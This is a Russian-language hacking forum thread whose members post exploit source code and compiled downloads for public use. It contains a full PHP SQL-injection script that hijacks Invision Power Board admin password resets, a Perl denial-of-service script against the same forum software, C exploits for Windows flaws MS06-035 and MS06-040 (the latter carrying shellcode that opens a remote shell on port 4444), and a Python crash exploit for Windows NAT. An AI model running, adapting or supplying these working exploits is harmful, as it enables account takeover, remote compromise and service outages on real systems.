Exploits скачать бесплатно. 10

( Вход | Регистрация )

Твой софтовый форум > Тематические форумы > Хак! Ломать не строить - это уметь надо

Exploits, Постим эксплойты

Дата обновления: 30.09.2009 - 06:52, перейти к новому сообщению

#1
de1ay профи! [SoftoRooMTeaM] Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010 Респектов: 613	Тема создана для того, что-бы закидывать сюда исходники свежих сплойтов! Никаких обсуждений в данной теме не ведём! Только описание сплойта, линк с исходниками или исходники, Межсайтовый скриптинг и SQL-инъекция в Invision Power Board (2.0.0 - 2.1.4) Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения. 1. Уязвимость существует из-за недостаточной обработки входных данных в файлах куки. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. 2. Уязвимость существует из-за недостаточной обработки входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Сплойт: » Exploit « /* ____ ________ __________ /____ \/__ __ \ /__________ \_ _ // _ \ / / / \ \ \\______ \__ __ \/ / // /__/ / / \\| _/ \| \ / / \_____ / / \|\| \| \ \| / / /_____ / / / \|\|____\|___/____/ \______/ \_/ / \|_________/_____/\_______/\___/ === - security team - === Invision Power Board < 2.1.4 Password change SQL-Injection Exploit by roOstY Ru24 Security Team <= www.Ru24-Team.net => ---- For example you can reset password for admin (link to "forget Password" add ask to change this password. At the end of exploit you get link to change admin password) Working in all Invision Power Forum forum before 2.1.4 but you need good mysql version Greetz to Nitrex and Dukenn Regards to: Dr_UFO_51,k0pa,NSD,Naikon and other... Before runing,you must setup some settings WARNING: You must setup the CURL-module for PHP! ---- / / In any case at first you need to change password to $target if you can't understand that / // error_reporting(E_ALL); ############ Settings ########################################################### $proxy="24.48..:"; ## - your socks 4/5-proxy $host="http://forum..lt"; ## - target forum $login=""; ## - login to forum $password="*"; ## - pass to forum $cook_name="ibf_topicsread"; ## - target cookie name (default: ibf_topicsread) $topic=22; ## - any real topyc $target=1; ## - id target to admin or other user that you want to reset password ##### # At first you need to reset pasword for target user. # For example you can reset password for admin (link to "forget Password" add ask to change this password. At the end of you get link to change admin password) #### $len=32; ## 5 for salt ## it's my $ver=1; ## if not wor change to 2 $cookie_file_path = "/tmp/cookie"; ## for my opinuion, you can to set other $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"; ################################################################################ $cookie=""; echo "Login..."; $url=$host."/index.php?act=Login&CODE=01&CookieDate=1"; $reffer=$host."/index.php?act=Login&CODE=00"; $post['UserName']=urlencode($login); $post['PassWord']=urlencode($password); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,$post,""); ###### Login to the forum $cook=getcookiee($result); foreach ($cook as $k=>$v) { $cookie[$k]=$v; } if (!strstr($result,$login)) { echo "error. Invalid Login or Password then Login\n"; exit; } else echo "done\n"; echo "Redirecting to main page..."; $url=$host.urldecode(ExtractString($result,$host,"\" ")); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",""); ###### Redirect to the main page $cook=getcookiee($result); foreach ($cook as $k=>$v) { $cookie[$k]=$v; } if (!strstr($result,$login)) { echo "error. Invalid Login or Password then Redirect\n"; exit; } else echo "done\n"; $reffer=$url; echo "Going to Control Panel..."; $url=$host."/index.php?act=UserCP&CODE=00"; $reffer="";$agent=""; $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",""); ###### Go te the control panel $cook=getcookiee($result); foreach ($cook as $k=>$v) { $cookie[$k]=$v; } if (!strstr($result,$login)) { echo "error. Invalid Login or Password then going to Control\n"; exit; } echo "done\n"; echo "Get table prefix..."; $arr[$topic]=1111111111; $arr['-1) andd']=$topic; $cookie_base=""; foreach ( $cookie as $k=>$v ) { $cookie_base.= $k."=".$v."; "; } $cookie_add=$cookie_base.$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); if (!(strstr($result,"Error"))) { echo "error. Target seems not vuln"; exit; } $pref=ExtractString($result,"SELECT FROM ","topics"); echo "done prefix: ".$pref."\n"; $al=""; echo "Checking Mysql version...."; $targval=explode(".",$target); $arr[$topic]=1111111111; $arr['-1) and @@version<4/']=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); if (!strstr($result,"showtopic=".$target)) echo "done Mysql ver > 4 - GOOD!\n"; else { echo "done Mysql ver < 4. We can use only dos\n"; exit; } echo "Exploiting...."; $sent='%61%3A%32%3A%7B%73%3A'; if ($ver==1) $exp="-999) UNION SELECT 0,vid,null,'open',0,1,1132440935,1,11132440935,0,null,null,0,0,2,2,1,0,0,0,0,0,1,0,0,0,0,0,0 from ".$pref."validating where member_id=".$target." LIMIT 1/"; else $exp="-999) UNION SELECT 0,vid,null,'open',0,1,1132440935,1,11132440935,0,null,null,0,0,2,2,1,0,0,null,null,0,0,1,0 from ".$pref."validating where member_id=".$target." LIMIT 1/"; $arr[$topic]=1111111111; $arr[$exp]=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); if (!strstr($result,"different number of columns")) { echo "done\n"; $vid=substr($result,strpos($result,"")-32,32); echo "Done\nGoto url: [".$host."/index.php?act=Reg&CODE=lostpassform&uid=".$target."&aid=".$vid."] and change user password!\n"; } else { echo "bad Can't find number of colums\n"; } echo "Checking Mysql version 2...."; $targval=explode(".",$target); $arr[$topic]=1111111111; $arr['-1) and @@version<4.1/']=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); //echo $result;exit; if (!strstr($result,"showtopic=".$target)) echo "done Mysql ver > 4.1 - GOOD!\n"; else { echo "done Mysql ver < 4.1. We can't use SUBSELECT\n"; exit; } echo "Bruteforcing....\n"; $val=""; for ($j=16;$j<=$len;$j++) { $a2=128; $a1=32; while (($a2-$a1)>=5) { $s=round(($a1+$a2)/2,0); echo $s; $arr[$topic]=1111111111; $arr['-1) and '.$s.'>(select ord(substring(vid,'.$j.',1)) from '.$pref.'validating where member_id='.$target.' LIMIT 1)/']=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); unset($arr); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); if ((strstr($result,"Error"))) { echo "Error querry!\n"; exit; } if (strstr($result,"showtopic")) $a2=$s; else $a1=$s; } for ($i=$a1;$i<=$a2;$i++) { echo $i; $arr[$topic]=1111111111; $arr['-1) and '.$i.'=(select ord(substring(vid,'.$j.',1)) from '.$pref.'validating where member_id='.$target.' LIMIT 1)/']=$topic; $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr)); $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add); // echo urlencode(serialize($arr)).$result;exit; if (strstr($result,"showtopic")) { $val .= chr($i); echo " - Get_symb:[".$j."] ".chr($i)."\n"; break; } } } echo "Done\nGoto url: [".$host."/index.php?act=Reg&CODE=lostpassform&uid=".$target."&aid=".strtolower($val)."] and change user password!\n"; function getcookiee($result) { $res = explode("\n",$result); foreach ($res as $k=>$v ) { if (ereg("Set-Cookie",$v)) { $c_a = explode(";",trim(str_replace("Set-Cookie:","",$v))); foreach ($c_a as $k=>$v ) { if (!(ereg("expires",$v))) { $arr=explode("=",trim($v)); $cook[trim($arr[0])]=trim($arr[1]); } } } } return $cook; } function querry($url,$agent,$proxy,$reffer,$cookie_file_path,$post,$cookie) { $ch = curl_init (); curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, $agent); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); if ($post!="") { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } curl_setopt ($ch, CURLOPT_TIMEOUT, 120); curl_setopt ($ch, CURLOPT_PROXY, $proxy); curl_setopt ($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt ($ch, CURLOPT_FAILONERROR, false); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_REFERER, $reffer); if ($cookie!="") curl_setopt($ch, CURLOPT_COOKIE, $cookie); // else { curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path); // } curl_setopt($ch, CURLOPT_HEADER, 1); $result = curl_exec($ch); $error=curl_errno($ch); curl_close ($ch); if ($error) $result="Fucking Error: ".$error."\r\n"; if ($error==7) $result=$result." Failed to connect() to host or proxy.\r\n"; if ($error==28) $result=$result." Operation timeout. The specified time-out period was reached according to the conditions.\r\n"; if ($error==22) $result=$result." Sorry, Unable to process request at this time, Please try again later.\r\n"; return $result; } function ExtractString($str, $start, $end) { $str_low = ($str); if (strpos($str_low, $start) !== false && strpos($str_low, $end, strpos($str_low, $start)) !== false) { $pos1 = strpos($str_low, $start) + strlen($start); $pos2 = strpos($str_low, $end,strpos($str_low, $start)) - $pos1; return substr($str, $pos1, $pos2); } } ?>

◄ Назад Вперед ►

3 Страницы 1 2 3

Ответов(10 - 19)

17.03.2006 - 8:44 #11
yah профи! [SoftoRooMTeaM] Группа: Наши Люди Сообщений: 2.336 Регистрация: 27.01.2006 Из: рнд Пользователь №: 500 Респектов: 408	RPC Exploit GUI v2 RPC Exploit GUI v2

19.03.2006 - 19:54 #12
de1ay профи! [SoftoRooMTeaM] Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010 Респектов: 613	Отказ в обслуживании в Microsoft Windows XP,2003 Сплойт: аттач Присоединённые файлы EvilIGMP.rar ( 87.54кб ) Кол-во скачиваний: 320

31.08.2006 - 22:12 #13
snike Опытный юзверь Группа: Пользователи Сообщений: 96 Регистрация: 20.01.2006 Пользователь №: 111.522 Респектов: 17 Предупреждений:	Появился эксплойт для DOS-атаки на форум IPB 2.1.х (до 2.1.7). Написан на Перле. Работает на всех версиях MySQL, для успешной работы требует magic_quotes_gpc = 0. Эксплуатирует уязвимость с CLIENT_IP (от 8.06.2006). Использование очень простое и стандартное: [путь к перлу] [путь к эксплойту] www.site.com /ipb/ » Нажмите, для открытия спойлера « CODE #!/usr/bin/perl use LWP::UserAgent; $ua = LWP::UserAgent->new; &header(); if (@ARGV < 2) {&info(); exit();} $server = $ARGV[0]; $dir = $ARGV[1]; print "[+] SERVER {$server}\r\n"; print "[+] DIR {$dir}\r\n"; #Step 1, detecting vulnerability print "[t] Testing forum vulnerability..."; $res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"'"); if($res->is_success) { if($res->as_string =~ /FROM (.)sessions/) { print "forum vulnerable\r\n"; } else { print "forum unvulnerable\r\n"; &footer(); exit(); } } else { print "something wrong :(\r\n"; &footer(); exit(); } #Step 2, prepare to DoS print "[?] How many attempts? "; $a = <STDIN>; print "[?] Timeout between attempts in seconds? "; $t = <STDIN>; $q = "OR benchmark(1000,benchmark(3000,md5(current_time)))/"; # calculation md5() 3 million times. You can increase or reduce this value print "[i] Starting DoS. Please, be patient\r\n"; #Step 3. DoS for ($i = 0; $i < $a; $i++) { $res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"' ".$q); sleep($t); } print "[!] Victim server may be down\r\n"; &footer(); $ex = <STDIN>; sub footer() { print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n"; print "[L] Visit: secbun.info \| rst.void.ru\r\n"; } sub header() { print q( -------- * Invision Power Board 2.1 <= 2.1.6 DoS Exploit * * Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc) * * Coded by w4g.not null * * FOR EDUCATIONAL PURPOSES ONLY * -------- ); } sub info() { print q( [i] Usage: perl w4gipbdos216.pl [server] [/dir/] where \|- server - server, where IPB installed without http:// \|- /dir/ - dir, where IPB installed or / for no dir e.g. perl w4gipbdos216.pl www.someserver.com /ipb/ [!] Working on all MySQL versions [!] Need magic_quotes_gpc = Off ); }

6.09.2006 - 7:52 #14
de1ay профи! [SoftoRooMTeaM] Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010 Респектов: 613	Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit Описание: сплойт вешает тачку без установленного апдейта » exploit code here « #include #include #include #pragma comment(lib,"ws2_32.lib") /************** Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit by cocoruder(frankruder_at_hotmail.com),2006.7.19 page:http://ruder.cdut.net *************/ unsigned char SmbNeg[] = "\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54" "\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"; unsigned char Session_Setup_AndX_Request[]= "\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00" "\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff" "\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d" "\x62\x00"; unsigned char TreeConnect_AndX_Request[]= "\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00" "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08" "\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00" "\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00" "\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f" "\x3f\x00"; unsigned char Trans_Request[]= "\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00" "\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55" "\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c" "\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41"; unsigned char recvbuff[2048]; void neg ( int s ) { char response[1024]; memset(response,0,sizeof(response)); send(s,(char )SmbNeg,sizeof(SmbNeg)-1,0); } void main(int argc,char *argv) { struct sockaddr_in server; SOCKET sock; DWORD ret; WSADATA ws; WORD userid,treeid; WSAStartup(MAKEWORD(2,2),&ws); sock = socket(AF_INET,SOCK_STREAM,0); if(sock<=0) { return; } if ( (argv[1]==NULL)\|\|(argv[2]==NULL)) { printf("Program usage: MS06-035.exe \n"); printf("Example: MS06-035.exe 192.168.0.1 445\n"); return; } server.sin_family = AF_INET; server.sin_addr.s_addr = inet_addr(argv[1]); server.sin_port = htons((USHORT)atoi(argv[2])); ret=connect(sock,(struct sockaddr )&server,sizeof(server)); if (ret==-1) { printf("connect error!\n"); return; } neg(sock); recv(sock,(char )recvbuff,sizeof(recvbuff),0); ret=send(sock,(char )Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0); if (ret<=0) { printf("send Session_Setup_AndX_Request error!\n"); return; } recv(sock,(char )recvbuff,sizeof(recvbuff),0); userid=(WORD )(recvbuff+0x20); //get userid memcpy(TreeConnect_AndX_Request+0x20,(char )&userid,2); //update userid ret=send(sock,(char )TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0); if (ret<=0) { printf("send TreeConnect_AndX_Request error!\n"); return; } recv(sock,(char )recvbuff,sizeof(recvbuff),0); treeid=(WORD )(recvbuff+0x1c); //get treeid memcpy(Trans_Request+0x20,(char )&userid,2); //update userid memcpy(Trans_Request+0x1c,(char )&treeid,2); //update treeid ret=send(sock,(char )Trans_Request,sizeof(Trans_Request)-1,0); if (ret<=0) { printf("send Trans_Request error!\n"); return; } recv(sock,(char )recvbuff,sizeof(recvbuff),0); } говорим спасибо кодеру cocoruder(frankruder_at_hotmail.com)

6.09.2006 - 15:36 #15
de1ay профи! [SoftoRooMTeaM] Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010 Респектов: 613	И ещё один сплойт бьющий на отказ Microsoft Windows 2000 SP0-SP4, Microsoft Windows XP SP0-SP1, Microsoft Windows NT 4.0 MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) » sources here « /* * MS06-040 Remote Code Execution Proof of Concept * * Ported by ub3r st4r aka iRP * --------- * Tested Against: * Windows XP SP1 * Windows 2000 SP4 * * Systems Affected: * Microsoft Windows 2000 SP0-SP4 * Microsoft Windows XP SP0-SP1 * Microsoft Windows NT 4.0 * --------- * This is provided as proof-of-concept code only for educational * purposes and testing by authorized individuals with permission * to do so. * * PRIVATE v.0.2 (08-27-06) / #include #include #pragma comment(lib, "mpr") #pragma comment(lib, "Rpcrt4") // bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0 unsigned char DCERPC_Bind_RPC_Service[] = "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00" "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" "\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88" "\x03\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00" "\x2B\x10\x48\x60\x02\x00\x00\x00"; // request windows api: NetprPathCanonicalize (0x1f) unsigned char DCERPC_Request_RPC_Service[] = "\x05\x00\x00\x03\x10\x00\x00\x00\x30\x08\x00\x00\x00\x00\x00\x00" "\x18\x08\x00\x00\x00\x00\x1f\x00\xff\xff\xff\xff\x01\x00\x00\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"; // path ... unsigned char DCERPC_Request_RPC_Service_[] = "\xfa\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" "\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00"; unsigned char sc[] = "\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa8\x97\x90" "\x88\x83\xeb\xfc\xe2\xf4\x29\x53\x6f\x67\x57\x68\xd4\x74\xc2\x7c" "\xdd\x60\x51\x68\x6f\x77\xc8\x1c\xfc\xac\x8c\x1c\xd5\xb4\x23\xeb" "\x95\xf0\xa9\x78\x1b\xc7\xb0\x1c\xcf\xa8\xa9\x7c\xd9\x03\x9c\x1c" "\x91\x66\x99\x57\x09\x24\x2c\x57\xe4\x8f\x69\x5d\x9d\x89\x6a\x7c" "\x64\xb3\xfc\xb3\xb8\xfd\x4d\x1c\xcf\xac\xa9\x7c\xf6\x03\xa4\xdc" "\x1b\xd7\xb4\x96\x7b\x8b\x84\x1c\x19\xe4\x8c\x8b\xf1\x4b\x99\x4c" "\xf4\x03\xeb\xa7\x1b\xc8\xa4\x1c\xe0\x94\x05\x1c\xd0\x80\xf6\xff" "\x1e\xc6\xa6\x7b\xc0\x77\x7e\xf1\xc3\xee\xc0\xa4\xa2\xe0\xdf\xe4" "\xa2\xd7\xfc\x68\x40\xe0\x63\x7a\x6c\xb3\xf8\x68\x46\xd7\x21\x72" "\xf6\x09\x45\x9f\x92\xdd\xc2\x95\x6f\x58\xc0\x4e\x99\x7d\x05\xc0" "\x6f\x5e\xfb\xc4\xc3\xdb\xfb\xd4\xc3\xcb\xfb\x68\x40\xee\xc0\x86" "\xcc\xee\xfb\x1e\x71\x1d\xc0\x33\x8a\xf8\x6f\xc0\x6f\x5e\xc2\x87" "\xc1\xdd\x57\x47\xf8\x2c\x05\xb9\x79\xdf\x57\x41\xc3\xdd\x57\x47" "\xf8\x6d\xe1\x11\xd9\xdf\x57\x41\xc0\xdc\xfc\xc2\x6f\x58\x3b\xff" "\x77\xf1\x6e\xee\xc7\x77\x7e\xc2\x6f\x58\xce\xfd\xf4\xee\xc0\xf4" "\xfd\x01\x4d\xfd\xc0\xd1\x81\x5b\x19\x6f\xc2\xd3\x19\x6a\x99\x57" "\x63\x22\x56\xd5\xbd\x76\xea\xbb\x03\x05\xd2\xaf\x3b\x23\x03\xff" "\xe2\x76\x1b\x81\x6f\xfd\xec\x68\x46\xd3\xff\xc5\xc1\xd9\xf9\xfd" "\x91\xd9\xf9\xc2\xc1\x77\x78\xff\x3d\x51\xad\x59\xc3\x77\x7e\xfd" "\x6f\x77\x9f\x68\x40\x03\xff\x6b\x13\x4c\xcc\x68\x46\xda\x57\x47" "\xf8\x67\x66\x77\xf0\xdb\x57\x41\x6f\x58"; int main(int argc, char argv[]) { HANDLE hFile; NETRESOURCE nr; char szRemoteName[MAX_PATH], szPipePath[MAX_PATH]; unsigned int i; unsigned char szInBuf[4096]; unsigned long dwRead, nWritten; unsigned char szReqBuf[2096]; if (argc < 3){ printf("[-] Usage: ms06040poc [target]\n"); printf("\t1 - Windows 2000 SP0-SP4\n"); printf("\t2 - Windows XP SP0-SP1\n"); return -1; } memset(szReqBuf, 0, sizeof(szReqBuf)); if (atoi(argv[2]) == 1) { unsigned char szBuff[1064]; // build payload buffer memset(szBuff, '\x90', 1000); memcpy(szBuff+630, sc, sizeof(sc)); for(i=1000; i<1064; i+=4) { memcpy(szBuff+i, "\x04\x08\x02\x00", 4); } // build request buffer memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1); memcpy(szReqBuf+44, "\x15\x02\x00\x00", 4); /* max count / memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4); / offset / memcpy(szReqBuf+52, "\x15\x02\x00\x00", 4); / actual count / memcpy(szReqBuf+56, szBuff, sizeof(szBuff)); memcpy(szReqBuf+1120, "\x00\x00\x00\x00", 4); / align string / memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1); memcpy(szReqBuf+1140 , "\xeb\x02", 2); } if (atoi(argv[2]) == 2) { unsigned char szBuff[708]; memset(szBuff, '\x90', 612); / size of shellcode / memcpy(szBuff, sc, sizeof(sc)); memcpy(szBuff+612, "\x0a\x08\x02\x00", 4); memset(szBuff+616, 'A', 8); // 8 bytes padding memcpy(szBuff+624, "\x04\x08\x02\x00", 4); memset(szBuff+628, '\x90', 32); memcpy(szBuff+660, "\x04\x08\x02\x00", 4); memset(szBuff+664, 'B', 8); // 8 bytes padding memcpy(szBuff+672, "\x04\x08\x02\x00", 4); memset(szBuff+676, '\x90', 32); // build request buffer memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1); memcpy(szReqBuf+44, "\x63\x01\x00\x00", 4); / max count / memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4); / offset / memcpy(szReqBuf+52, "\x63\x01\x00\x00", 4); / actual count / memcpy(szReqBuf+56, szBuff, sizeof(szBuff)); memcpy(szReqBuf+764, "\x00\x00\x00\x00", 4); / align string / memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1); } printf("[+] Connecting to %s ... \n", argv[1]); _snprintf(szRemoteName, sizeof(szRemoteName), "\\\\%s\\ipc$", argv[1]); nr.dwType = RESOURCETYPE_ANY; nr.lpLocalName = NULL; nr.lpProvider = NULL; nr.lpRemoteName = szRemoteName; if (WNetAddConnection2(&nr, "", "", 0) != NO_ERROR) { printf("[-] Failed to connect to host !\n"); return -1; } _snprintf(szPipePath, sizeof(szPipePath), "\\\\%s\\pipe\\browser", argv[1]); hFile = CreateFile(szPipePath, GENERIC_READ\|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (hFile == INVALID_HANDLE_VALUE) { printf("[-] Failed to open named pipe !\n"); return -1; } printf("[+] Binding to RPC interface ... \n"); if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service, sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL) == 0) { printf("[-] Failed to bind to interface !\n"); CloseHandle(hFile); return -1; } printf("[+] Sending RPC request ... \n"); if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) { printf("[-] Unable to transmit RPC request !\n"); CloseHandle(hFile); return -1; } printf("[+] Now check for shell on %s:4444 !\n", argv[1]); return 0; } Скомпиленный здесь:* https://softoroom.org/...M.NeT.rar.html $PwD= SoftoRooM.NeT

7.09.2006 - 9:10 #16
Jon-dog Грамотный Группа: Пользователи Сообщений: 235 Регистрация: 29.11.2005 Пользователь №: 76.326 Респектов: 10 Предупреждений:	Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit Posted by iLLuZionist Respect! Compeled Version: https://softoroom.org/....NeT_.rar.html PASS: SoftoRooM.NeT

11.09.2006 - 6:28 #17
Jon-dog Грамотный Группа: Пользователи Сообщений: 235 Регистрация: 29.11.2005 Пользователь №: 76.326 Респектов: 10 Предупреждений:	IGMP v3 DoS Exploit Эфект тот же что и от EvilIGMP, только консольный вариант + исходник _http://www.stargate-net.ru/1/IGMP.C З.Ы. ригистр в ссылке обязателен Добавлено: Ну и чуть не забыл Откомпиленая версия: _http://www.stargate-net.ru/1/IGMP.exe

11.09.2006 - 6:49 #18
Jon-dog Грамотный Группа: Пользователи Сообщений: 235 Регистрация: 29.11.2005 Пользователь №: 76.326 Респектов: 10 Предупреждений:	MS04-007-dos Posted by Raider_Singer На удаленной системе должен быть открытым 445 порт XP-SP0, SP-1, 2k, 2003 _http://download.secur...04-007-dos.exe

29.10.2006 - 22:36 #19
de1ay профи! [SoftoRooMTeaM] Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010 Респектов: 613	Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit Очередной сплойт для проведения ДоС атаки... КПД на 0, зато нервы успокаивает #!/usr/bin/python # Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit # Bug discovered by h07 # Tested on XP SP2 Polish # Details: # # Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..] # # [Process svchost.exe, module ipnathlp] # --> MOV DL, [EAX] # Exception C0000005 (ACCESS_VIOLATION reading [00000000]) ## from socket import * from time import sleep host = "192.168.0.1" port = 53 buffer = ( # DNS (query) "\x6c\xb6" # Transaction ID: 0x6cb6 "\x01\x00" # Flags: 0x0100 (Standard query) "\x00\x00" # Questions: 0 "\x00\x00" # Answer RRs: 0 "\x00\x00" # Authority RRs: 0 "\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0) "\x03\x77\x77\x77" # "\x06\x67\x6f\x6f" # "\x67\x6c\x65\x03" # "\x63\x6f\x6d\x00" # Name: www.google.com "\x00\x01" # Type: A (Host address) "\x00\x01" # Class: IN (0x0001) ) s = socket(AF_INET, SOCK_DGRAM) s.connect((host, port)) s.send(buffer) sleep(1) s.close() # EoF

12.11.2006 - 16:00 #20
de1ay профи! [SoftoRooMTeaM] Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010 Респектов: 613	QUOTE Jon-dog плз перезалей Аттач Пароль на архив: SoftoRooM.NeT Присоединённые файлы lsa.rar ( 8.03кб ) Кол-во скачиваний: 99

Версия для печати

Вид темы: [ Линейный ] · Стандартный · Режимы сортировки: [ По возрастанию (0-9) ] · По убыванию (9-0)

« Предыдущая тема · Следующая тема »

◄ Назад Вперед ►

3 Страницы 1 2 3

Сейчас: 25.04.2024 - 16:29

Мобильная версия | Lite версия

SoftoRooM © 2004-2024